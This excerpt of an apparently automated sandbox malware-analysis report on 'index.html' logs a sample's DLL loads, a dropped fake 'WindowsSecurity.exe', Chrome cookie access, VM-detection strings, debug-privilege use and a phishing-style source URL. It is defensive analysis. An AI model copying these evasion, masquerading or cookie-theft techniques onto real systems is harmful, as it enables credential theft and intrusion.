Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsSecurity.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsSecurity.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsSecurity.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsSecurity.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsSecurity.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsSecurity.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsSecurity.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsSecurity.exe	Section loaded: mswsock.dll	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIDE18.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	File created: C:\Windows\System32\WindowsSecurity.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\aad8b01279cc480a8b0be83b32a3a3e2$dpx$.tmp\74515b7c1140a14b9759a7e7790d6d88.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsSecurity.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Window / User API: threadDelayed 5910	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Window / User API: threadDelayed 2262	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Window / User API: threadDelayed 701	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Window / User API: threadDelayed 467	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2539	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 389	Jump to behavior

Source: C:\Windows\System32\msiexec.exe TID: 5508	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe TID: 5884	Thread sleep count: 205 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe TID: 5884	Thread sleep time: -205000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe TID: 5884	Thread sleep count: 163 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe TID: 5884	Thread sleep count: 5910 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe TID: 5884	Thread sleep count: 56 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe TID: 5884	Thread sleep count: 2262 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe TID: 5884	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe TID: 5884	Thread sleep count: 701 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe TID: 5884	Thread sleep count: 467 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe TID: 5884	Thread sleep count: 143 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5356	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * from Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * from Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Windows Analysis Report index.html

General Information

Detection

Signatures

Classification

Signatures

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

AI Summary

Source: https://security.cleodgiflaoer.com/?domain=

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
index.html

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: 0xKYIPFUTJYQ.exe, 0000001D.00000003.3328560233.0000026BFCFE1000.00000004.00000020.00020000.00000000.sdmp, 0xKYIPFUTJYQ.exe, 0000001D.00000003.2156968765.0000026BFCFE1000.00000004.00000020.00020000.00000000.sdmp, 0xKYIPFUTJYQ.exe, 0000001D.00000003.2162214809.0000026BFCFE1000.00000004.00000020.00020000.00000000.sdmp, 0xKYIPFUTJYQ.exe, 0000001D.00000003.2150951747.0000026BFCFE0000.00000004.00000020.00020000.00000000.sdmp, 0xKYIPFUTJYQ.exe, 0000001D.00000003.3209282947.0000026BFCFDA000.00000004.00000020.00020000.00000000.sdmp, 0xKYIPFUTJYQ.exe, 0000001D.00000003.2173790228.0000026BFCFDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8<
Source: 0xKYIPFUTJYQ.exe, 0000001D.00000000.2044412388.00007FF76D870000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: vmware
Source: 0xKYIPFUTJYQ.exe, 0000001D.00000000.2044412388.00007FF76D870000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: virtualqemuvmwareoracleinnotekAuthenticAMDGenuineIntel\\?\ManufacturerSELECT * from Win32_BIOSSMBIOSBIOSVersion
Source: WindowsSecurity.exe, 00000020.00000002.2101247626.0000025DE42E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN8KP

Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-3d584cfc-0cb4-49fb-a58e-ce40a203f734\files\0xKYIPFUTJYQ.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
